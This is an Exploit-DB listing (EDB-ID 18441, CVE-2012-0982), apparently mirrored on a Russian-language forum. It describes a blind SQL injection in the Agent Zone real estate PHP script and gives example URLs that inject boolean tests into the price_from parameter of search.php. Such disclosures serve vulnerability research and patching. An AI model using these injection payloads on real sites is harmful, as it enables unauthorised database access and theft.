- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 18441
- Проверка EDB
-
- Пройдено
- Автор
- CAGRI TEPEBASILI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2012-0982
- Дата публикации
- 2012-01-31
Код:
Agent Zone Vastal I-Tech Blind SQL Injection Vulnerability
# Date: 31.01.2012
# Author: Cagri Tepebasili
# Software : http://www.vastal.com/agent-zone-real-estate-script.html
# Tested on: Linux Mint 12
#####################################################################################################################
The First Step >>>
http://server/real/search.php?price_from=1000000.00+and+1=1&price_to=10000000.00
The Second Step >>>
http://server/real/search.php?price_from=1000000.00+and+1=0&price_to=10000000.00
Injection >>>
http://server/real/search.php?price_from=1000000.00[BlindSQLI]&price_to=10000000.00
Greetz : MythSEC <<<- Источник
- www.exploit-db.com
